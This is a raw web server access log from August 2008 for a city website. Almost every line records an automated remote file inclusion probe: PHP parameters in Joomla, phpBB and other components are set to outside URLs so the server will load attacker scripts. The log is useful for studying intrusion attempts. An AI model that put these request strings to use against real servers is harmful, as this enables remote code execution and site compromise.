77.221.130.3 - - [31/Aug/2008:22:42:26 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://websnap.ru//wp-content/uploads/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "cityofarkadelphia.com"
209.62.80.134 - - [31/Aug/2008:22:44:44 -0700] "GET /logs//language/lang_german/lang_main_album.php?phpbb_root_path=http://www.cerfirenze.it/images/icone/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "cityofarkadelphia.com"
209.62.80.134 - - [31/Aug/2008:22:44:44 -0700] "GET //language/lang_german/lang_main_album.php?phpbb_root_path=http://www.cerfirenze.it/images/icone/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "cityofarkadelphia.com"
216.246.28.43 - - [31/Aug/2008:22:46:22 -0700] "GET /logs/access_080701.log/htmltonuke.php?filnavn=http://indocairo.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "cityofarkadelphia.com"
216.246.28.43 - - [31/Aug/2008:22:46:45 -0700] "GET /logs/access_080701.log/htmltonuke.php?filnavn=http://indocairo.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "cityofarkadelphia.com"
216.246.28.43 - - [31/Aug/2008:22:47:01 -0700] "GET /logs/access_080701.log/htmltonuke.php?filnavn=http://indocairo.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "cityofarkadelphia.com"
61.19.158.41 - - [31/Aug/2008:22:50:36 -0700] "GET /logs//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://rafiantika.fileave.com/child.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
61.19.158.41 - - [31/Aug/2008:22:50:36 -0700] "GET /logs/access.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://rafiantika.fileave.com/child.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
61.19.158.41 - - [31/Aug/2008:22:50:42 -0700] "GET //include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://rafiantika.fileave.com/child.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
72.9.233.10 - - [31/Aug/2008:22:50:51 -0700] "GET /logs/access.log/convert/mvcw.php?step=1&vwar_root=http://indocairo.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "cityofarkadelphia.com"
72.9.233.10 - - [31/Aug/2008:22:50:51 -0700] "GET /convert/mvcw.php?step=1&vwar_root=http://indocairo.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "cityofarkadelphia.com"
72.9.233.10 - - [31/Aug/2008:22:50:51 -0700] "GET /logs/convert/mvcw.php?step=1&vwar_root=http://indocairo.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "cityofarkadelphia.com"
72.9.233.10 - - [31/Aug/2008:22:50:52 -0700] "GET /logs/access.log/convert/mvcw.php?step=1&vwar_root=http://indocairo.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "cityofarkadelphia.com"
72.9.233.10 - - [31/Aug/2008:22:50:52 -0700] "GET /convert/mvcw.php?step=1&vwar_root=http://indocairo.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "cityofarkadelphia.com"
72.9.233.10 - - [31/Aug/2008:22:50:52 -0700] "GET /logs/convert/mvcw.php?step=1&vwar_root=http://indocairo.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "cityofarkadelphia.com"
61.19.158.41 - - [31/Aug/2008:22:53:11 -0700] "GET /logs/access.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://rafiantika.fileave.com/child.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
61.19.158.41 - - [31/Aug/2008:22:53:11 -0700] "GET //include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://rafiantika.fileave.com/child.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
61.19.158.41 - - [31/Aug/2008:22:53:18 -0700] "GET /logs//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://rafiantika.fileave.com/child.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
58.69.172.67 - - [31/Aug/2008:22:58:03 -0700] "GET /logs/access_080330.log//components/com_flyspray/startdown.php?file=http://www.marioni.info/alb2?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "cityofarkadelphia.com"
58.69.172.67 - - [31/Aug/2008:22:58:04 -0700] "GET //components/com_flyspray/startdown.php?file=http://www.marioni.info/alb2?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "cityofarkadelphia.com"
58.69.172.67 - - [31/Aug/2008:22:58:09 -0700] "GET /logs//components/com_flyspray/startdown.php?file=http://www.marioni.info/alb2?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "cityofarkadelphia.com"
216.246.28.43 - - [31/Aug/2008:22:59:00 -0700] "GET /logs/access_080331.log/htmltonuke.php?filnavn=http://indocairo.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "cityofarkadelphia.com"
216.246.28.43 - - [31/Aug/2008:22:59:01 -0700] "GET /htmltonuke.php?filnavn=http://indocairo.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "cityofarkadelphia.com"
216.246.28.43 - - [31/Aug/2008:22:59:02 -0700] "GET /logs/htmltonuke.php?filnavn=http://indocairo.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "cityofarkadelphia.com"
77.221.130.3 - - [31/Aug/2008:23:00:11 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://websnap.ru//wp-content/uploads/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "cityofarkadelphia.com"
216.246.28.43 - - [31/Aug/2008:23:01:19 -0700] "GET /logs/access_080331.log/htmltonuke.php?filnavn=http://indocairo.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "cityofarkadelphia.com"
216.246.28.43 - - [31/Aug/2008:23:01:20 -0700] "GET /htmltonuke.php?filnavn=http://indocairo.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "cityofarkadelphia.com"
216.246.28.43 - - [31/Aug/2008:23:01:21 -0700] "GET /logs/htmltonuke.php?filnavn=http://indocairo.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "cityofarkadelphia.com"
216.246.28.43 - - [31/Aug/2008:23:01:27 -0700] "GET /logs/access_080331.log/htmltonuke.php?filnavn=http://indocairo.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "cityofarkadelphia.com"
216.246.28.43 - - [31/Aug/2008:23:01:27 -0700] "GET /htmltonuke.php?filnavn=http://indocairo.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "cityofarkadelphia.com"
216.246.28.43 - - [31/Aug/2008:23:01:28 -0700] "GET /logs/htmltonuke.php?filnavn=http://indocairo.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "cityofarkadelphia.com"
58.69.172.67 - - [31/Aug/2008:23:02:51 -0700] "GET /logs/access.log//components/com_flyspray/startdown.php?file=http://www.marioni.info/alb2?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "cityofarkadelphia.com"
72.233.63.178 - - [31/Aug/2008:23:04:45 -0700] "GET //include/write.php?dir=http://lipuu.com/tool/chid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "cityofarkadelphia.com"
72.233.63.178 - - [31/Aug/2008:23:04:45 -0700] "GET /logs/access.log//include/write.php?dir=http://lipuu.com/tool/chid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "cityofarkadelphia.com"
72.233.63.178 - - [31/Aug/2008:23:04:45 -0700] "GET /logs//include/write.php?dir=http://lipuu.com/tool/chid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "cityofarkadelphia.com"
195.39.5.203 - - [31/Aug/2008:23:11:44 -0700] "GET /logs/access_080330.log/errors.php?error=http://www.lesplaisirslibertins.com/backup/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
195.39.5.203 - - [31/Aug/2008:23:11:45 -0700] "GET /errors.php?error=http://www.lesplaisirslibertins.com/backup/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
64.72.112.158 - - [31/Aug/2008:23:11:51 -0700] "GET /logs/access_080330.log/akocomments.php?mosConfig_absolute_path=ftp://216.12.192.109/ids.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "cityofarkadelphia.com"
64.72.112.158 - - [31/Aug/2008:23:11:52 -0700] "GET /akocomments.php?mosConfig_absolute_path=ftp://216.12.192.109/ids.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "cityofarkadelphia.com"
64.72.112.158 - - [31/Aug/2008:23:11:52 -0700] "GET /logs/akocomments.php?mosConfig_absolute_path=ftp://216.12.192.109/ids.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "cityofarkadelphia.com"
195.39.5.203 - - [31/Aug/2008:23:11:54 -0700] "GET /logs/access_080330.log/errors.php?error=http://albcrew.t35.com/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
195.39.5.203 - - [31/Aug/2008:23:11:55 -0700] "GET /errors.php?error=http://albcrew.t35.com/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
195.39.5.203 - - [31/Aug/2008:23:11:56 -0700] "GET /logs/errors.php?error=http://albcrew.t35.com/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
195.39.5.203 - - [31/Aug/2008:23:11:58 -0700] "GET /logs/access_080330.log/errors.php?error=http://www.geocities.com/kucluxanang/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
195.39.5.203 - - [31/Aug/2008:23:12:05 -0700] "GET /logs/errors.php?error=http://www.geocities.com/kucluxanang/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
216.246.28.43 - - [31/Aug/2008:23:13:41 -0700] "GET /logs/access_080331.log/htmltonuke.php?filnavn=http://indocairo.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "cityofarkadelphia.com"
216.246.28.43 - - [31/Aug/2008:23:13:41 -0700] "GET /htmltonuke.php?filnavn=http://indocairo.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "cityofarkadelphia.com"
216.246.28.43 - - [31/Aug/2008:23:13:42 -0700] "GET /logs/htmltonuke.php?filnavn=http://indocairo.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "cityofarkadelphia.com"
216.246.28.43 - - [31/Aug/2008:23:14:16 -0700] "GET /logs/access_080331.log/htmltonuke.php?filnavn=http://indocairo.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "cityofarkadelphia.com"
216.246.28.43 - - [31/Aug/2008:23:14:16 -0700] "GET /htmltonuke.php?filnavn=http://indocairo.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "cityofarkadelphia.com"
216.246.28.43 - - [31/Aug/2008:23:14:17 -0700] "GET /logs/htmltonuke.php?filnavn=http://indocairo.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "cityofarkadelphia.com"
216.246.28.43 - - [31/Aug/2008:23:14:28 -0700] "GET /logs/access_080331.log/htmltonuke.php?filnavn=http://indocairo.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "cityofarkadelphia.com"
216.246.28.43 - - [31/Aug/2008:23:14:28 -0700] "GET /htmltonuke.php?filnavn=http://indocairo.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "cityofarkadelphia.com"
216.246.28.43 - - [31/Aug/2008:23:14:29 -0700] "GET /logs/htmltonuke.php?filnavn=http://indocairo.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "cityofarkadelphia.com"
216.246.28.43 - - [31/Aug/2008:23:14:35 -0700] "GET /logs/access_080331.log/htmltonuke.php?filnavn=http://indocairo.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "cityofarkadelphia.com"
216.246.28.43 - - [31/Aug/2008:23:14:35 -0700] "GET /htmltonuke.php?filnavn=http://indocairo.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "cityofarkadelphia.com"
216.246.28.43 - - [31/Aug/2008:23:14:36 -0700] "GET /logs/htmltonuke.php?filnavn=http://indocairo.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "cityofarkadelphia.com"
85.17.6.7 - - [31/Aug/2008:23:16:51 -0700] "GET /logs//?path%5Bdocroot%5D=http://albcrew.t35.com/pw.txt? HTTP/1.1" 200 4089 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
85.17.6.7 - - [31/Aug/2008:23:16:51 -0700] "GET //?path%5Bdocroot%5D=http://albcrew.t35.com/pw.txt? HTTP/1.1" 200 917 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
78.41.19.131 - - [31/Aug/2008:23:17:43 -0700] "GET /logs/access_080330.log/akocomments.php?mosConfig_absolute_path=ftp://216.12.192.109/ids.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
78.41.19.131 - - [31/Aug/2008:23:17:48 -0700] "GET /akocomments.php?mosConfig_absolute_path=ftp://216.12.192.109/ids.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
78.41.19.131 - - [31/Aug/2008:23:17:49 -0700] "GET /logs/akocomments.php?mosConfig_absolute_path=ftp://216.12.192.109/ids.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
78.41.19.131 - - [31/Aug/2008:23:17:57 -0700] "GET /logs/access_080330.log/akocomments.php?mosConfig_absolute_path=ftp://216.12.192.109/ids.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
78.41.19.131 - - [31/Aug/2008:23:17:57 -0700] "GET /akocomments.php?mosConfig_absolute_path=ftp://216.12.192.109/ids.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
78.41.19.131 - - [31/Aug/2008:23:18:02 -0700] "GET /logs/akocomments.php?mosConfig_absolute_path=ftp://216.12.192.109/ids.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
78.41.19.131 - - [31/Aug/2008:23:18:07 -0700] "GET /logs/access_080330.log/akocomments.php?mosConfig_absolute_path=ftp://216.12.192.109/ids.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
78.41.19.131 - - [31/Aug/2008:23:18:07 -0700] "GET /akocomments.php?mosConfig_absolute_path=ftp://216.12.192.109/ids.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
78.41.19.131 - - [31/Aug/2008:23:18:07 -0700] "GET /logs/akocomments.php?mosConfig_absolute_path=ftp://216.12.192.109/ids.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
78.41.19.131 - - [31/Aug/2008:23:18:16 -0700] "GET /logs/access_080330.log/akocomments.php?mosConfig_absolute_path=ftp://216.12.192.109/ids.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
78.41.19.131 - - [31/Aug/2008:23:18:16 -0700] "GET /logs/akocomments.php?mosConfig_absolute_path=ftp://216.12.192.109/ids.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
78.41.19.131 - - [31/Aug/2008:23:18:20 -0700] "GET /akocomments.php?mosConfig_absolute_path=ftp://216.12.192.109/ids.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
74.54.42.146 - - [31/Aug/2008:23:19:37 -0700] "GET /modules/My_eGallery/index.php?basepath=http://locoputo.supergranny.ws/ids.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "cityofarkadelphia.com"
74.54.42.146 - - [31/Aug/2008:23:19:37 -0700] "GET /logs/access_080201.log/modules/My_eGallery/index.php?basepath=http://locoputo.supergranny.ws/ids.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "cityofarkadelphia.com"
74.54.42.146 - - [31/Aug/2008:23:19:37 -0700] "GET /logs/modules/My_eGallery/index.php?basepath=http://locoputo.supergranny.ws/ids.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "cityofarkadelphia.com"
74.54.42.146 - - [31/Aug/2008:23:19:43 -0700] "GET /modules/My_eGallery/index.php?basepath=http://locoputo.supergranny.ws/ids.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "cityofarkadelphia.com"
74.54.42.146 - - [31/Aug/2008:23:19:43 -0700] "GET /logs/access_080201.log/modules/My_eGallery/index.php?basepath=http://locoputo.supergranny.ws/ids.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "cityofarkadelphia.com"
74.54.42.146 - - [31/Aug/2008:23:19:43 -0700] "GET /logs/modules/My_eGallery/index.php?basepath=http://locoputo.supergranny.ws/ids.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "cityofarkadelphia.com"
78.41.19.131 - - [31/Aug/2008:23:21:11 -0700] "GET /administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=ftp://216.12.192.109/ids.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
78.41.19.131 - - [31/Aug/2008:23:21:11 -0700] "GET /logs/access_080401.log/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=ftp://216.12.192.109/ids.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
78.41.19.131 - - [31/Aug/2008:23:21:17 -0700] "GET /logs/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=ftp://216.12.192.109/ids.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
78.41.19.131 - - [31/Aug/2008:23:21:29 -0700] "GET /logs/access_080401.log/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=ftp://216.12.192.109/ids.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
78.41.19.131 - - [31/Aug/2008:23:21:35 -0700] "GET /administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=ftp://216.12.192.109/ids.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
78.41.19.131 - - [31/Aug/2008:23:21:35 -0700] "GET /logs/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=ftp://216.12.192.109/ids.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
78.41.19.131 - - [31/Aug/2008:23:22:08 -0700] "GET /logs/access_080401.log/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=ftp://216.12.192.109/ids.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
78.41.19.131 - - [31/Aug/2008:23:22:08 -0700] "GET /administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=ftp://216.12.192.109/ids.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
78.41.19.131 - - [31/Aug/2008:23:22:14 -0700] "GET /logs/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=ftp://216.12.192.109/ids.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
195.39.5.203 - - [31/Aug/2008:23:25:44 -0700] "GET /logs/access_071231.log/errors.php?error=http://albcrew.t35.com/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
78.41.19.131 - - [31/Aug/2008:23:25:48 -0700] "GET /administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=ftp://216.12.192.109/ids.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
78.41.19.131 - - [31/Aug/2008:23:25:56 -0700] "GET /logs/access_080401.log/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=ftp://216.12.192.109/ids.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
78.41.19.131 - - [31/Aug/2008:23:25:56 -0700] "GET /logs/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=ftp://216.12.192.109/ids.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
195.39.5.203 - - [31/Aug/2008:23:28:03 -0700] "GET /errors.php?error=http://www.lesplaisirslibertins.com/backup/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
211.239.162.41 - - [31/Aug/2008:23:28:14 -0700] "GET /logs/access_080101.log%20//language/lang_german/lang_main_album.php?phpbb_root_path=http://sunshineruby.com/han/Favorites/%B9C%C0%B8/Games/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "cityofarkadelphia.com"
74.54.42.146 - - [31/Aug/2008:23:28:40 -0700] "GET /logs/access_080401.log/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=ftp://216.12.192.109/ids.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "cityofarkadelphia.com"
74.54.42.146 - - [31/Aug/2008:23:28:41 -0700] "GET /logs/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=ftp://216.12.192.109/ids.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "cityofarkadelphia.com"
74.54.42.146 - - [31/Aug/2008:23:28:41 -0700] "GET /administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=ftp://216.12.192.109/ids.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "cityofarkadelphia.com"
74.54.42.146 - - [31/Aug/2008:23:28:46 -0700] "GET /logs/access_080401.log/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=ftp://216.12.192.109/ids.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "cityofarkadelphia.com"
74.54.42.146 - - [31/Aug/2008:23:28:50 -0700] "GET /logs/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=ftp://216.12.192.109/ids.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "cityofarkadelphia.com"
74.54.42.146 - - [31/Aug/2008:23:28:50 -0700] "GET /administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=ftp://216.12.192.109/ids.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "cityofarkadelphia.com"
74.54.42.146 - - [31/Aug/2008:23:28:52 -0700] "GET /logs/access_080401.log/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=ftp://216.12.192.109/ids.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "cityofarkadelphia.com"
74.54.42.146 - - [31/Aug/2008:23:28:52 -0700] "GET /logs/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=ftp://216.12.192.109/ids.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "cityofarkadelphia.com"
74.54.42.146 - - [31/Aug/2008:23:28:53 -0700] "GET /administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=ftp://216.12.192.109/ids.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "cityofarkadelphia.com"
195.39.5.203 - - [31/Aug/2008:23:28:53 -0700] "GET /logs/access_071231.log/errors.php?error=http://www.lesplaisirslibertins.com/backup/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
211.239.162.41 - - [31/Aug/2008:23:29:21 -0700] "GET //language/lang_german/lang_main_album.php?phpbb_root_path=http://sunshineruby.com/han/Favorites/%B9C%C0%B8/Games/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "cityofarkadelphia.com"
195.39.5.203 - - [31/Aug/2008:23:29:41 -0700] "GET /logs/access_071231.log/errors.php?error=http://www.geocities.com/kucluxanang/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
89.186.1.54 - - [31/Aug/2008:23:30:54 -0700] "GET /logs/access_080330.log//?path[docroot]=http://ploplop123.x10hosting.com/rfi/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "cityofarkadelphia.com"
89.186.1.54 - - [31/Aug/2008:23:30:54 -0700] "GET //?path[docroot]=http://ploplop123.x10hosting.com/rfi/id.txt???? HTTP/1.1" 200 917 "-" "libwww-perl/5.800" "cityofarkadelphia.com"
89.186.1.54 - - [31/Aug/2008:23:30:54 -0700] "GET /logs//?path[docroot]=http://ploplop123.x10hosting.com/rfi/id.txt???? HTTP/1.1" 200 4089 "-" "libwww-perl/5.800" "cityofarkadelphia.com"
74.54.42.146 - - [31/Aug/2008:23:31:01 -0700] "GET /logs/access.log/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=ftp://216.12.192.109/ids.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "cityofarkadelphia.com"
200.25.180.198 - - [31/Aug/2008:23:31:12 -0700] "GET /logs/index.php?body=http://www.fileden.com/files/2008/6/19/1967132/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
200.25.180.198 - - [31/Aug/2008:23:31:12 -0700] "GET /index.php?body=http://www.fileden.com/files/2008/6/19/1967132/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
74.54.42.146 - - [31/Aug/2008:23:31:13 -0700] "GET /logs/access.log/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=ftp://216.12.192.109/ids.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "cityofarkadelphia.com"
200.25.180.198 - - [31/Aug/2008:23:31:16 -0700] "GET /logs/access.log/index.php?body=http://www.fileden.com/files/2008/6/19/1967132/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
74.54.42.146 - - [31/Aug/2008:23:31:20 -0700] "GET /logs/access.log/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=ftp://216.12.192.109/ids.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "cityofarkadelphia.com"
89.186.1.54 - - [31/Aug/2008:23:32:40 -0700] "GET /logs/access_071201.log//?path[docroot]=http://ploplop123.x10hosting.com/rfi/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "cityofarkadelphia.com"
66.103.152.151 - - [31/Aug/2008:23:32:59 -0700] "GET /logs/access_080201.log/modules/My_eGallery/index.php?basepath=http://lawoder.t35.com/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "cityofarkadelphia.com"
66.103.152.151 - - [31/Aug/2008:23:32:59 -0700] "GET /modules/My_eGallery/index.php?basepath=http://lawoder.t35.com/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "cityofarkadelphia.com"
66.103.152.151 - - [31/Aug/2008:23:33:00 -0700] "GET /logs/modules/My_eGallery/index.php?basepath=http://lawoder.t35.com/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "cityofarkadelphia.com"
74.54.42.146 - - [31/Aug/2008:23:33:32 -0700] "GET /logs/modules/My_eGallery/index.php?basepath=ftp://216.12.192.109/ids.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "cityofarkadelphia.com"
74.54.42.146 - - [31/Aug/2008:23:33:32 -0700] "GET /modules/My_eGallery/index.php?basepath=ftp://216.12.192.109/ids.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "cityofarkadelphia.com"
74.54.42.146 - - [31/Aug/2008:23:33:32 -0700] "GET /logs/access_080201.log/modules/My_eGallery/index.php?basepath=ftp://216.12.192.109/ids.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "cityofarkadelphia.com"
74.54.42.146 - - [31/Aug/2008:23:34:24 -0700] "GET /logs/access_080201.log/modules/My_eGallery/index.php?basepath=ftp://216.12.192.109/ids.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "cityofarkadelphia.com"
